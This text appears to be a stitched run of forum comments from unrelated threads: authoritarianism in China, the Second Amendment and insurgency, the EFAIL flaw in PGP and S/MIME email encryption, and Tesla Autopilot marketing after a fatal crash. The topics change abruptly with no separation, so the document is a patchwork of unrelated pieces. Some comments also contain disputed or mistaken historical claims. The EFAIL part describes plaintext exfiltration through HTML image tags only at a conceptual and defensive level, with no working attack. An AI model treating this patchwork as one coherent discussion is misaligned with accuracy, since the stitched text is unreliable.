It's one thing to invoke Abraham Maslow for aesthetic purposes during flowery discussion, but Maslow isn't followed much or at all by current researchers.
I can’t say I follow modern economics too closely, but does anyone really dispute that the need for food is a lower level one than the need for academic achievements, for example?
You've hit the nail on the head. But I think there are two separate issues at play here. The first issue is the re-writing of the social contract that can only be done by implementing mass surveillance. This approach is arguably justifiable and gives the government more control to optimize how things work. The second issue is having one party government where there is not opposition. To me this approach is definitely dangerous long term. Complete tyranny is fantastic when you have a great dictator, however there's just no evidence that this model is sustainable. If China gets too crazy, the best and brightest will want to leave the country. It's definitely a crazy and bold experiment and it's definitely working in the short term.
Successful "tyranny" could be analogous to successful multicellular life. We could be witnessing a similar development in the history of life. But note that multicellular life never wiped out single cells, and in fact we live symbiotically with a large number. Plus, cancer is apparently not something that can be eliminated.
There are good reasons to believe China's situation is in fact quite unique among totalitarian concepts and very difficult to replicate. China's situation represents a very complex, multi-generational cultural-political totalitarianism, and it required a unique context economically for it to occur. I've never seen another nation come even remotely close to replicating what it takes to set that up.
Take Turkey for example, under Erdoğan. Let's say he is, or wants to be, a traditional dictator. He's probably gone in 10 or 20 years due to age. His regime ends with him, very likely, because there's no broad cultural underpinning to his regime and legacy. That's the case in most totalitarian examples of the last century.
The cultural reformations that enabled the China boom, starting with Deng Xiaoping, are being systematically rolled backwards.
The economic gains from the late 1970s to ~2009, were very easy compared to the challenges that come next to continue pushing the per capita results ever higher. When you're starting from $175 GDP per capita in 1980, just about any meaningful improvement at all in the system will get you to $1,000 or $2,000 per capita.
My point being, only when the tide goes out do you see who is swimming naked, to borrow a line from Warren Buffett. China's vast growth no doubt masks immense problems that only become clearer in their scope and risk as their 30 year economic expansion matures (as it is now).
The people of China will tolerate a lot of things if you take them from $200 GDP per capita to $10,000. China is not going to be able to replicate that climb again, from here forward. That will have consequences, as the social contract in China requires perpetual, preferably rapid, improvement.
What China has done is extraordinarily expensive. They paid for it with a unique, historically singular export machine and trade surplus and starting from a context of a near zero welfare state (diverts capital from investment & growth) and from a setup with nearly maximum economic slack (easy to fill in for decades).
What other nations have anything like that setup to replicate from? Russia (fascist dictatorship, long totalitarian history) for example doesn't have that sort of extreme economic slack, its GDP per capita is already up where China is at today; the same goes for Turkey. The Russian system is mature, slow growth, with considerable existing structural financial demands that prevent the vast free use of capital as in China.
China's rules today are not the same as China's rules in 1996 or 2006. Culturally they've lost a lot of the modest freedom gains that were acquired over decades, in just the last five or six years. How does that impact the ability of their economic system to continue to scale over time, as the oppression ramps up?
These are two different systems - Deng vs Xi - not a continuing of the same system. Xi gets to ride on the accomplishments of the Deng revolution, including the financial capabilities it made possible. I think it's a fair question as to whether China can keep moving forward as they previously were, while simultaneously removing the Deng approach that made it all possible in the first place.
Don't ignore the different philosophical foundation of Asian societies. Confucianism is quite different from the Western line of tradition starting from the Greeks. Confucianism emphasizes community and obedience more, which is more compatible with mass surveillance.
What Xi is doing is not Confucianism. Confucianism had an elaborate set of rules that everyone, from the top down, was required to follow. Xi is basically making up the rules as he goes along.
> In the West we have a false sense of security that totalitarianism will inevitably fail.
The West has had, for the last 200 years (and arguably for the last 500) the advantage that its economic system is better than its rivals. This is a massive, game-changing advantage. But it's not obvious to me that the West is still ahead economically -- look at China's growth rates over the last 40 years. Admittedly they are coming from behind, but because of their population they only need 1/4 of the GDP per head of the USA to be ahead on total GDP.
I would say there's about a 50% possibility that China will make an authoritarianism that works, that's at least as successful economically as the West. And if that comes about it will be a real game-changer. And frankly, I don't think the West is up to the task of meeting the challenge; certainly I would not bet on Trump, Merkel, May et al doing the right thing.
The Marxist/Maoist idea of the Chinese would be that the government is just part of the superstructure on top of the base. The base being the current state of the forces of production in their continual self-evolution and reinvention, and the relations of production flowing from that.
In other words, the economic system determines the political system. When hunter-gatherers became farmers, the political system changed. When farming as the center made way for manufacturing and industry, the political system changed (as did culture).
I don't see this as much different than Americans driving Lakota onto the Standing Rock Indian Reservation. Just two years ago the US federal government arrested and injured many on that reservation. Or Americans driving Vietnamese onto strategic hamlets. Or locking Japanese up in the 1940s. I don't see what innovation the Chinese have made.
You're never allowed to mention anything bad that's ever happened in the West, that's whataboutism. Randomly bringing up extremist scenarios like Mao's genocide of landlords or Stalin's gulags to prematurely shut down moderate pro-left discussions like "let's make healthcare a little more socialized in the US"? That's not whataboutism™.
Very well put and also very true. Most people are absolutely unaware how fast big shifts happen. The invention of national-socialism with the foundation of the NSDAP happened 1920. A few years later a highly weaponized and aggressive Germany invaded Poland in 1939. 19 years from zero to war.
Considering how much more technology has evolved since then, it isn't far-fetched to think that this pace of devolution into totalitarianism could happen much faster today.
In fact, this is precisely what happened with ISIS. I shudder to think what might have happened if the powers to be had not put aside their differences to fight a common foe.
> Seems many Americans are willing to crap all over the 2nd Amendment, which is specifically in place to prevent totalitarian government.
The 2nd Amendment specifies that a well regulated militia is necessary for a free state, and that the right to keep and bear arms cannot be abridged by the Federal government.
Nothing in that amendment specifically mentions the purpose of preventing totalitarian government. That's a modern interpretation, albeit one currently upheld by the Supreme Court.
> Nothing in that amendment specifically mentions the purpose of preventing totalitarian government.
You have to take into account the context. It was written and ratified by people who'd just staged a revolution against what they described as a "tyrannical" regime, often using their own personal weapons.
To note that the Constitution doesn't mention "totalitarianism" is to note that it doesn't contain an anachronism. It's a modern coinage that's not to far in meaning from "tyranny."
If you genuinely believe this argument, wouldn't the logical parellal thought be to starve the government of manpower and weapons? Instead, most who espouse the '2 amendment is needed against tyranny' position are often voting for massive increases to defense and policing budgets. Not picking a fight, it just seems ineffective and incongruous to think that holding on to an AR15 in your home will help you against billion dollar integrated policing and surveillance systems...
> Seems many Americans are willing to crap all over the 2nd Amendment, which is specifically in place to prevent totalitarian government.
Exactly. If America has learned anything from the past half century of foreign military adventures, it should be that a big modern Army can't easily defeat a motivated insurgency that has the support and sympathy in the local population.
The 2nd Amendment may have a lot of costs, but the private gun ownership it provides for would definitely make it much more difficult for a domestic totalitarian regime to establish itself in the US.
Successful insurgencies these days are supplied with heavy weapons and training by outside powers. You’re not going to do anything against armour and air power with small arms.
> Successful insurgencies these days are supplied with heavy weapons and training by outside powers. You’re not going to do anything against armour and air power with small arms.
An insurgency has a lot of freedom in choosing its targets. If they don't have the weapons to directly attack armor or air power, they can avoid them. And with armor, there are other options, such as IEDs.
Also, I'd bet that an American insurgency against a totalitarian American government would get outside arms and support, as well as sympathy, support, and defections from actual US Army units. I don't think the US military would be able to maintain the same level of cohesion it has during foreign wars in a civil war.
A totalitarian regime would probably repeal the 2nd amendment as one of it's first acts, the the existing stock of small arms and ammunition would be enough for an insurgency or rebellion to start. I'd be much harder for a disarmed population to begin resistance.
I think that's a pipe dream. If it was a right wing totalitarian government, which is imho the likely lean of any totalitarian government in the us, there would be little defection or protest from folks in uniform.
Think about any standoff between protesters and police or national guard in the us. Lefty students or unionists or whatever get shot or peppersprayed by cops or national guardsmen with a family to feed and a career defined by obeying the rules - that equation will not change with scale.
I wonder if the winning side of a US military civil war would capture territory "nation building" style or if they would just use asymmetric reprisals. If it's the latter, civilian gun ownership is just going to get neighbors of insurgents blown up.
I'm also pretty sure that Iraqi civilians didn't have much access to small arms prior to the destabilization of the country. Didn't slow down the insurgency any.
Yup Trump, Afghanistan, Iraq, Syria, the 2008 meltdown, Zuckerberg turning the internet into his private sewage factory etc etc are all shining achievements of western wisdom and deep thought. The poor unimaginative illiterates of the Orient just don't get it. If only they understood what magic freedom can produce.
Btw I suggest you reread your French Revolution history. The aristocracy was very much back in power within a year of the king getting his head chopped off. And then they propped up Napoloen who decided he needed to conquer the world. The next 100 years were spent with the elites of one European country or another colonising and pilaging most of South America, Africa and Asia. So much for freedom and equality and the aristocracy learning any lesson. They are still more of less in power with the same mindless global ambitions unless you haven't seen the inequality numbers and have your head buried deep in the sand.
Within a few decades of the French revolution half of the European governments were overthrown and replaced with constitutional Monarchies. The other half that resisted were forced into increasing totalitarianism and in a few more decades themselves overthrown in year zero revolutions.
The one country to avoid this, Britain, learned the lesson of the French Revolution. They maed enough reforms that there was no constituency for revolution.
> The one country to avoid this, Britain, learned the lesson of the French Revolution. They maed enough reforms that there was no constituency for revolution.
Er, Britain had been a constitutional monarchy for a long time before the French Revolution, and many of the others made reforms rather than being overthrown, and in many cases, like Britain, well before the French Revolution.
Both of you are somewhat right. The various events of the late seventeenth century helped prevent revolution from popping up around the French Revolution, but their political system at the time prevented most of the country from having a role in politics. This was a wide issue in Europe, and the Revolutions of 1848 were largely about that issue. Britain had addressed that issue with the Reform Acts, allowing their government to stay stable through the period.
> In the West we have a false sense of security that totalitarianism will inevitably fail.
At the height of civil war the western classical liberal democracies looked weak and near collapse while Soviet looked too strong and awesome until one day it just collapsed. It is a bubble boy vs Sewer Rat thing. The bubble boy looks extremely clean and insulated from bad things until one day it just dies of common cold. The filthy NY sewer rat however survives carrying in itself 10 different types of plagues.
> China seems committed to making totalitarianism "work."
We need to take a backseat and realise that American media simply does not get China, India or Japan. They are judging the world from their own spectacles which might be wrong. An average Chinese today is freerer than an average Chinese 30 years ago despite all efforts by their government. An average American today is less free than an average American 30 years ago.
I am incredible hopeful for India and China in upcoming efforts. I recently spoke to a Chinese attache at local embassy. He was as ecstatic to be outside China as now he could access Youtube and Facebook. He considered his own government moves to ban these services in his country absolutely stupid and saw them as a hindrance to help China emerge as a soft power.
> At the height of civil war the western classical liberal democracies looked weak and near collapse w hile Soviet looked too strong and awesome until one day it just collapsed.
FYI the American Civil War ended in 1865 while the first Soviet was in 1905. And the first ~10 years after the ‘17 revolution were absolutely terrible in the Soviet Union. So your statement just isn’t correct.
Abstract: S/MIME and MUAs are broken. OpenPGP (with MDC) is not, but clients MUST check for GPG error codes. Use Mutt carefully or copy/paste into GPG for now.
- Some mail clients concatenate all parts of a multipart message together, even joining partial HTML elements, allowing the decrypted plaintext of an OpenPGP or S/MIME encrypted part to be exfiltrated via an image tag. Mail clients shouldn't be doing this in any world, and can fix this straightforwardly.
- S/MIME (RFC 5751) does not provide for authenticated encryption, so the ciphertext is trivially malleable. An attacker can use a CBC gadget to add the image tag into the ciphertext itself. We can't expect a mail client to avoid exfiltrating the plaintext in this case. S/MIME itself needs to be fixed (or abandoned).
- OpenPGP (RFC 4880) provides for authenticated encryption (called "MDC", see sections 5.13 and 13.11 of the RFC) which would prevent a similar CFB-based gadget attack if enforced. GPG added this feature in 2000 or 2001. If the MDC tag is missing or invalid, GPG returns an error. If GPG is asked to write the plaintext as a file, it will refuse. When the output is directed to a pipe, it will write the output and return an error code [1]. An application such as an MUA using it in this manner must check for the error code before rendering or processing the result. It seems this requirement was not made clear enough to implementors. The mail clients need to release patches to check for this error. This will create an incompatibility with broken OpenPGP implementations that have not yet implemented MDC.
- Even without clients enforcing or checking the authentication tag, it's a bit trickier to pull off the attack against OpenPGP because the plaintext may be compressed before encryption. The authors were still able to pull it off a reasonable percentage of the time. Section 14 of RFC 4880 actually describes a much earlier attack which was complicated in this same manner; it caused the OpenPGP authors to declare decompression errors as security errors.
Net-net, using encrypted email with Mutt is safe [2, Table 4], though even there, opening HTML parts encrypted with S/MIME in a browser is not, and double-checking how it handles GPG errors would be prudent before forking a browser on any OpenPGP encrypted parts. See the paper for other unaffected clients, including Claws (as noted below) and K-9 Mail (which does not support S/MIME). Otherwise, it's probably best to copy and paste into GPG (check the error code or ask it to write to a file) until this is worked out.
“If GPG is asked to write the plaintext as a file, it will refuse. When the output is directed to a pipe, it will write the output and return an error code”
I honestly don’t care about the rationale, but this inconsistent behaviour is simply wrong. After 18 years of discussion, end this. Whenever DECRYPTION_FAIL occurs, there MUST be no decrypted content.
That's not really compatible with piped output. The encrypted message can't be authenticated until it has been completely processed, but the whole point of piping is to output bytes as soon as they're available.
Perhaps the moral of this story is to disable GPG's pipe feature? But it's a legitimate and significant performance improvement for authentic messages. You "just" have to remember to check the error code and it's fine/safe.
Perhaps that's just too much to ask. Maybe we just can't have fast streaming decryption because it's too hard for client developers to use safely. But that point of view is at least not obvious.
(On the other hand, what were you planning to do with the piped output in the first place? Probably render it, right? If GPG clients stream unauthenticated bytes into a high-performance HTML renderer, the result will surely be efail.)
That is not the whole point of piping, and the default behavior of GPG should be to buffer, validate the MDC, and release plaintext only after it's been authenticated. Pipes are a standardized Unix interface between processes, not a solemn pledge to deliver bytes as quickly as possible.
If pipes had the connotation you claim they do, it would never be safe to pipe ciphertext, because the whole goal of modern AEAD cryptography is never to release unauthenticated plaintext to callers.
Clients encrypting whole ISO images should expect that decryption will require a non-default flag. Ideally, GPG would do two-pass decryption, first checking the MDC and then decrypting. Either way, the vast, commanding majority of all messages GPG ever processes --- in fact, that the PGP protocol processes --- should be buffered and checked.
If you have a complaint about how unwieldy this process is, your complaint is with the PGP protocol. The researchers, and cryptographers in general, agree with you.
Is it so easy for GPG to buffer the cleartext while validating the MDC? As the cleartext may not fit in RAM, this means that GPG could need to write it to a temporary file, right? But then, if decryption is aborted messily (e.g., the machine loses power), then this means that GPG would be leaving a file with part of the cleartext behind, which has obvious security implications.
You could also imagine a two-pass approach where you first verify and then decrypt, but then what about a timing attack where a process would be modifying the encrypted file between the two passes?
Again, the cleartext virtually always fits trivially in RAM, and when it doesn't, it can error out and require a flag to process. Yes, this is easy to fix.
OpenPGP needs to change as well, but that doesn't make insecure behavior acceptable in the interim, no matter what Werner Koch thinks.
What is the point of piping, in your view? My understanding is that it's a stream of bytes with backpressure, designed specifically to minimize buffering (by pausing output when downstream receivers are full/busy).
> If pipes had the connotation you claim they do, it would never be safe to pipe ciphertext, because the whole goal of modern AEAD cryptography is never to release unauthenticated plaintext to callers.
You say that like it's a reductio ad absurdum, but I think that's essentially right; you can't do backpressure with unauthenticated ciphertext. You have to buffer the entire output to be sure that it's safe for further processing.
Thus, if you want to buffer the entire output, don't use a pipe; ask the tool to generate a file, and then read the file only when the process says that the file is done and correct.
(I'd say that's a lot more wieldy than two-pass decryption.)
Based on your other remarks about PGP, (nuke it from orbit) I'm not sure you have any constructive remarks to make on how to improve GPG, but I guess making it two-pass by default (with a --dangerous-single-pass flag) would be an improvement.
For normal size emails, users probably wouldn't notice the performance cost of the second pass, and clients who care about performance at that level can opt into single-pass decryption and just promise to check the error code.
Backpressure is a feature of Unix pipes. It isn't their raison d'être.
I don't care how you implement it, but any claim that you can't check the MDC in GPG because it's a piped interface is obviously false. GPG can, like any number of Unix utilities, some casually written and some carefully written, simply buffer the data, process it, and write it.
Nobody said "you can't check the MDC." Everybody said "you have to check GPG's error code."
And I think it's clear to everybody (in this thread) that GPG's approach is a dangerous blame-the-user approach to API design, even granting that this dangerous approach offers optimum performance (especially relative to adding an entire second pass).
You are getting your concepts confused. Pipes are one thing, but the concept at hand is in fact filters, programs that primarily read data from their standard inputs and write other (processed) data to their standard outputs. What pipes involve is a red herring, because filters do not necessitate pipes. Filters have no requirements that they write output whilst there is still input to be read, and several well-known filter programs indeed do not do that.
This is why I initially hesitated to implement a streaming interface for my crypto library¹ (authenticated encryption and signatures). I eventually did it, but felt compelled to sprinkle the manual with warnings about how streaming interfaces encourage the processing of unauthenticated messages.
Now that we have a vulnerability with a name, I think I can make those warning even scarier. I'll update that manual.
> Use Mutt carefully or copy/paste into GPG for now.
According to [1], Claws Mail is also unaffected. I don't know if it was tested with or without its HTML plugin, but this should make no difference as long as the plugin is not configured to access remote resources. (By default it can not make network requests.)
OK, so Thunderbird plus Enigmail is probably most popular in Linux. And according to Robert J. Hansen:[0]
> By default, GnuPG will scream bloody murder if a message lacks an MDC or if the MDC is invalid. At that point it's up to your email client to pay attention to the warning and do the right thing. Enigmail 2.0 and later are fine, but I can't speak for other systems.
So if you use Enigmail, do make sure that you're not at v1.99. Just get the add-on in Thunderbird.
Also, of course, make sure that external resources aren't being fetched.
Edit: Oh, but damn. There's more in that thread. Enigmail >v2 can be forced to decrypt with MDC missing.[1] And this is a gpg bug:[2]
> ... and Patrick, moving faster than the speed of light, already has the bug triaged and bounced back. This is actually a GnuPG bug, not an Enigmail bug. ...
However:[3]
> It's worth noting, incidentally, the #Efail attack flat-out requires MIME. So inline PGP messages are not vulnerable, as there's no MIME parsing pass which can be exploited. So you're still safe, although this is still a bug that should be fixed. ;)
I also saw something about it requiring HTML decoding, but can't find it again :(
More: Yes, disable HTML rendering. In Thunderbird, select "/ View / Message Body As / Plain Text".
And:[4]
> The EFAIL attacks break PGP and S/MIME email encryption by coercing clients into sending the full plaintext of the emails to the attacker. In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs. To create these exfiltration channels, the attacker first needs access to the encrypted emails, for example, by eavesdropping on network traffic, compromising email accounts, email servers, backup systems or client computers. The emails could even have been collected years ago.
So basically, 1) the attacker embeds a link to the encrypted message, 2) the email client fetches and decrypts it, and then 3) sends plaintext back to the attacker.
> So basically, 1) the attacker embeds a link to the encrypted message, 2) the email client fetches and decrypts it, and then 3) sends plaintext back to the attacker.
What? The attacker embeds secure content inside a link, not a link to the content. It could come from files stored in a public place or emails.
Check RFC2634 before you abandon S/MIME. Triple wrapping solves surreptitious forwarding, which is how this attack works. Sadly AFAIK it's implemented only in Trustedbird.
Tesla probably shouldn't be saying anything about this at all, even just to avoid giving it more news cycles. But if they were going to say something, here's what they should have said the first time.
----
We take great care in building our cars to save lives. Forty thousands Americans die on the roads each year. That's a statistic. But even a single death of a Tesla driver or passenger is a tragedy. This has affected everyone on our team deeply, and our hearts go out to the family and friends of Walter Huang.
We've recovered data that indicates Autopilot was engaged at the time of the accident. The vehicle drove straight into the barrier. In the five seconds leading up to the crash, neither Autopilot nor the driver took any evasive action.
Our engineers are investigating why the car failed to detect or avoid the obstacle. Any lessons we can take from this tragedy will be deployed across our entire fleet of vehicles. Saving other lives is the best we can hope to take away from an event like this.
In that same spirit, we would like to remind all Tesla drivers that Autopilot is not a fully-autonomous driving system. It's a tool to help attentive drivers avoid accidents that might have otherwise occurred. Just as with autopilots in aviation, while the tool does reduce workload, it's critical to always stay attentive. The car cannot drive itself. It can help, but you have to do your job.
We do realize, however, that a system like Autopilot can lure people into a false sense of security. That's one reason we are hard at work on the problem of fully autonomous driving. It will take a few years, but we look forward to some day making accidents like this a part of history.
>t's a tool to help attentive drivers avoid accidents that might have otherwise occurred.
This needs far more discussion. I just don't buy it. I don't believe that you can have a car engaged in auto-drive mode and remain attentive. I think our psychology won't allow it. When driving, I find that I must be engaged and on long trips I don't even enable cruise control because taking the accelerator input away from me is enough to cause my mind to wander. If I'm not in control of the accelerator and steering while simultaneously focused on threats including friendly officers attempting to remind me of the speed limit I space out fairly quickly. In observing how others drive, I don't think I'm alone. It's part of our nature. So then, how is it that you can have a car driving for you while simultaneously being attentive? I believe they are so mutually exclusive as to make it ridiculous to claim that such a thing is possible.
I don't buy this either nor should we it's not how the feature is marketed.
"The system is designed to be able to conduct short and long distance trips with no action required by the person in the driver’s seat."
The result of this statement and the functionality that matches it is it creates a re-enforced false sense of security.
Does it matter whether the driver of the model X whose auto pilot drove straight into a center divider had his hands on the wheel if the outcome of applying autopilot is drivers focus less on the road? What is the point of two drivers one machine one human? You cannot compare car auto pilot to airplane they're not even in the same league. How often does a center divider just pop up at 20k ft?
Usually machinery either augments human capabilities by enhancing them, or entirely replaces them. This union caused by both driver and car piloting the vehicle has no point especially when it's imperfect.
I'm not opposed to Tesla's sale of such functionality, sell whatever you want, but I am opposed to the marketing material selling this in a way that contradicts the legal language required to protect Tesla...
There's risks in everything you do, but don't market a car as having the hardware to do 2x your customers driving capability and then have your legal material say: * btw don't take your hands off the steering wheel... especially when there's a several minute video showing exactly that.
Tesla customers must have the ability to make informed choices in the risks they take.
Which is, by the way, part of why I love the marketing for Mobileye (at least in Israel, haven't seen e.g. American ads). It's marketed not as driving the car, but as stepping in when the human misses something. Including one adorable TV spot starring an argumentative couple who used to argue about who's a better driver, and now uses the frequency of Mobileye interventions as a scoring system. Kind of like autonomous car disengagement numbers :-P
There is a solution for this - if the driver shows any type of pattern of not using the feature safely, disable the feature. Autopilot and comparable functionality from other vehicles should be considered privileges that can be revoked.
Systems that are semi autonomous where there's some expectation of intervention work well in those scenarios, keep the car in lane markers on the highway, etc. Make sure the users hands are on the wheel but for fully autonomous even if your hands are on the wheel, how does it know your paying attention?
This is exactly what the Tesla does. It periodically "checks" that you are there by prompting you to hold the steering wheel (requiring a firm grip, not just hands on the wheel). If you don't, the car slows to a stop and disables autopilot for the remainder of the drive.
> I'm not opposed to Tesla's sale of such functionality, sell whatever you want, but I am opposed to the marketing material selling this in a way that contradicts the legal language required to protect Tesla...
First let me state that I agree with this 110%!
I'm not sure if this is what you are getting at but I'm seeing a difference between the engineers exact definition of what the system is, what it does, and how it can be properly marketed to convey that in the most accurate way. I'm also seeing the marketing team saying whatever they can, within their legal limits (I imagine), in order to attract potential customers to this state-of-the-art system and technology within an already state-of-the-art automobile.
If we are both at the same time taking these two statements verbatim than which one wins out:
> Autopilot is not a fully-autonomous driving system. It's a tool to help attentive drivers avoid accidents that might have otherwise occurred. Just as with autopilots in aviation, while the tool does reduce workload, it's critical to always stay attentive. The car cannot drive itself. It can help, but you have to do your job.
and
> The system is designed to be able to conduct short and long distance trips with no action required by the person in the driver’s seat.
If that's the crux of the issue that goes to court then who wins? The engineering, legal, marketing department, or do they all lose because the continuous system warnings that Autopilot requires attentive driving were ignored and a person who already knew and complained of the limits of that system decided to forego all qualms about it and fully trust in it this time around?
I feel like when I was first reading and discussing this topic I was way more in tune with the human aspect of the situation and story. I still feel a little peeved at myself for starting to evolve the way I'm thinking about this ordeal in a less human and more practical way.
If we allow innovation to be distinguished for reasons such as these will we ever see major growth in new technology sectors? That might be a little overblown but does the fact that Tesla's additions to safety and standards thus having a markedly lower accident and auto death rate mean nothing in context?
If Tesla is doing a generally good job and bringing up the averages on all sorts of safety standards while sprinting headlong towards even more marked improvements are we suddenly supposed to forget everything we know about automobiles and auto accidents / deaths while examining individual cases?
Each human life is important. This man's death was not needed and I'm sure nobody at Tesla, or anywhere for that matter, is anything besides torn up about having some hand in it. While profit is definitely a motive I think the means to get to the profit they seek Tesla knows they have to create a superior product and that includes superior features and superior safety standards. If Tesla is meeting and beating most of those goals and we have a situation such as this why do I feel (and I could be way wrong here) that Tesla is being examined as if they are an auto manufacturer with a history of lemons, deadly flipped car accidents, persistent problems, irate customers, or anything of the like in this situation?
For whatever reason it kind of reminds me of criminal vs. civil court cases. Criminal it's upon the State or Prosecution to prove their case. In the civil case the burden is on the Defense to prove their innocence. For some reason I feel like Tesla is in a criminal case but having to act like it's a civil case where if they don't prove themselves they will lose out big.
To me it feels like the proof is there. The data is there. The facts are known. The fact that every Tesla driver using Autopilot in that precise location doesn't suffer the same fate points toward something else going on but the driver's actions also don't seem to match up with what is known about him and the story being presented on the other side. It's really a hairy situation and I feel like it warrants all sorts of tip toeing around but I also have the feeling that allowing that "feeling" aspect to dictate the arguments for either side of this case are just working backwards.
And for what it's worth I don't own a Tesla, I've never thought about purchasing one. I like the idea, my brother's friend has one and it's neat to zoom around in but I'm just trying to look at this objectively from all sides without pissing too many people off. Sorry if I did that to you, it wasn't my intent.
No one wins when someone dies... I'm sure your right that Tesla employees are torn up.
My concern is that it looks like Tesla is 90% of the way there to full autonomy and the way the feature is marketing will lull even engineers who know more about how these systems work into a false sense of security and end up dying as a result -- they'll trust a system that shouldn't be trusted. There isn't a good system for detecting a lack of focus especially when it won't take more than a few milliseconds to go from good to tragic.
I have to preface my post to say that I think developing self-driving automobiles is so important that it's worth the implied cost of potentially tens of thousands of lives in order to perfect the technology, because that's what people do; make sacrifices to improve the world we live in so that future generations don't have to know the same problem. But I think you're right. I think the "best" way to move forward until we have perfected the technology is not something that drives for you, but something that will completely take over the millisecond the car detects that something terrible is about to happen. People will be engaged because they have to be engaged, to drive the car. The machine can still gather all the data and ship it off to HQ to improve itself (and compare its own decisions to those of the human driver, which IMO is infinitely more valuable). But if there's one thing the average person is terrible at, it's reacting quickly to terrible situations. You're absolutely right that people can't be trusted to remain actively engaged when something else is doing the driving. Great example with the cruise control, too.
No one dies so someone 10 years from now can watch a full episode of the family guy unimpeded for the duration of their commute.
The human toll is irrelevant to the conversation, what's relevant is whether risks taken are being taken knowingly - you cannot market a self driving vehicle whose functionality "is 2x better than any human being" while simultaneously stating in your legal language to protect yourself: don't take your hands off the wheel - that's bs.
Plenty of people die right now because they just got a text or they had no other way home from the bar, etc.
The human toll is absolutely relevant to the conversation: this is about people dying now and in the future. It seems cruel to discuss it in a "I'll sacrifice X to save Y" later, but it can reasonably be reduced to that.
I think it's safe to assume that this will drastically reduce driving related injuries and deaths.
It's a deceptive to assume autopilot saves lives when it too has taken them. The number of people with access to auto pilot is far fewer to statistically determine how many more center divider deaths we might have if everyone were it's passenger.
Is the life taken by auto pilot worth less than the life taken by the aggressive driver who takes out an innocent driver? No.
I hope we eventually save lives as in net improvement in current death totals by using these technologies but the risks are not well communicated, the marketing is entirely out of sync with the risks and the "martyrs" we create thus to me look like victims.
> Is the life taken by auto pilot worth less than the life taken by the aggressive driver who takes out an innocent driver? No.
I think beliefs such as these is fueled by the extremely naive implication that each death will cause the learning algorithm to "improve itself" so every self driving thing out there is safer owing to that death..
That's not the thrust of my point... Talking about how many people have to die to perfect autonomous vehicles is pointless, some people are willing to jump out of airplanes & they fully understand the risks.
Some number of people, N are willing to risk their lives to use autonomous vehicles they'll die as a result. It should be just as clear to person using autopilot the risks involved not misled with marketing fluff that doesn't come close to reality. Martyrs not victims
>I think it's safe to assume that this will drastically reduce driving related injuries and deaths.
This assumes that the self driving tech will continue to increase in competence and will at some point surpass humans. I somehow find that extremely optimistic, bordering in on being naive.
Consider something like OCR or object recognition alone, where similar tech is applied. Even with decades of research behind it, it really cannot come any where close to a human in terms of reliability. I am talking about stuff that can be trained endlessly with any sort of risk. Still it does not show an ever increasing capability.
Now, machine learning and AI is only part of the picture. The other part is the sensors. This again is not anywhere near the sensors a human is equipped with.
From what we have seen in the tech industry in recent years is that trust in a tech by the people, even intelligent ones such as people who are investing in it, is not based on logic (Theranos, uBeam etc). I think such a climate is exactly what is enabling tests such as these. But unlike others, these tests are actually putting unsuspecting lives on line. And that should not be allowed..
It is optimistic. Is it naive? Only in the sense that I don't do development in that realm and I can only base my assessment on what's publicly discussed.
Please note that I artfully omitted a due date on my assumption. There's so much money involved here and so much initial traction that it is indeed reasonable to think that tech can surpass a "normal" driver.
I'm also biased against human drivers, plenty of whom should not be behind the wheel.
>There's so much money involved here and so much initial traction that it is indeed reasonable to think that tech can surpass a "normal" driver.
I don't think it is reasonable at all to reach that conclusion based on the money involved...You just can't force progress/breakthrough just by throwing money at all problem..
>I'm also biased against human drivers, plenty of whom should not be behind the wheel.
So I think it would be quite trivial to drastically increase the punishment of dangerous practices if caught. I mean, suspend license or ban for life if you are caught texting while driving or drunk driving.
Money absolutely matters. If there's no money, there's no development. And vice versa. That funded development isn't a guarantee of success, but it raises the odds to be non-zero.
You're also ignoring a key point: we have "self-driving" cars right now, but they're not good enough yet. Computer hardware is getting cheaper day by day, and right now the limiting factor appears to be the cost of sensors.
>Money absolutely matters. If there's no money, there's no development. And vice versa.
Both are not true. It does not need money for a man to have a great breakthrough idea. It is also not possible to guarantee generation a great idea by just throwing more and more money at researchers...
Here is the messy situation: maybe this system is better at avoiding accidents than 40% of the people 99.999% of the time.
The best thing is to build a system to analyze your driving and figure out if you are in that 40% of people and then let it drive for you. Maybe drunk drivers, for example. It can do this per ride: “oh you’re driving recklessly, do you want me to take over?”
EVERYTHING ELSE SHOULD BE A STRICT IMPROVEMENT. Taking over driving and letting people stop paying attention is not a strict improvement.
The argument should NOT be about playing with people’s lives now so im the future some people can have a better system. That’s a ridiculous argument. Instead WHY DON’T THE COMPANIES COLLABORATE ON OPEN SOURCE SOFTWARE AND RESEARCH TO ALL BUILD ON EACH OTHER’S WORK? Capitalism and “intellectual property”, that’s why. In this case, a gift economy like SCIENCE or OPEN SOURCE is far far superior at saving lives. But we are so used to profit driven businesses, it’s not likely they will take such an approach to it.
What we have instead is companies like Waymo suing Uber and Uber having deadly accidents.
And what we SHOULD have is if an incremental improvement makes things safer, every car maker should be able to adopt it. There should be open source shops for this stuff like Linux that enjoy huge defensive patent portfolios.
Pioneers usually are people well aware that what they’re doing is risky. I doubt that the victims of the last Tesla crashes and of the latest Uber crash regarded themselves as Pioneers. They probably just wanted to safely arrive at their destination and relied on a feature marketed as being capable to bring them there.
The pioneers in this case are putting other people’s life at risk.
Wayne seems to demonstrate that improving self-driving cars without leaving a trail of bodies behind seems in the realm of possibility, so let’s measure Tesla against that standard.
The cars can improve by being pieces of soft foam emulating the aerodynamics of a car while atop a metal base with wheels and an engine inside the foam. They would be fully autonomous with no human driver, avoid collisions as much as possible and yet fluffy enough to not hurt anyone even at high speeds.
I disagree with your initial sentiment. In my opinion, we can have self driving cars without a large human toll. I just think we need to stop trying to merge self driving cars into a road system designed for human operators. Moreover, we should not be "beta testing" our self driving cars on roads with human operators. Accidents will happen, as ML models can and do go unstable from time to time. Instead, we should look to update our roads and infrastructure to be better suited to automated cars. Till then, I hope those martyred in the name of self driving technology are not near and dear to you (even if you'd feel it's worth it).
To me beta testing should be a long period of time where the computer is running while humans are driving, with deviations between what the computer would do if it had control versus what the human actually does being recorded for future training. The value add is that the computer can still be used to alert to dangerous conditions, or potentially even overriding in certain circumstances (applying break when lidar sees an obstacle at night when the human driver didn't see it).
The problem is that Uber needs self driving cars in order to make money, and Tesla firmly believes that their system is safer than human drivers by themselves (even if a few people who wouldn't have otherwise died do, others who might have died won't and they believe those numbers make it worth it).
It's surprising that this isn't the standard right now. I'm certain the people at Tesla/Uber/Waymo have considered this - I'm curious why this approach isn't more common.
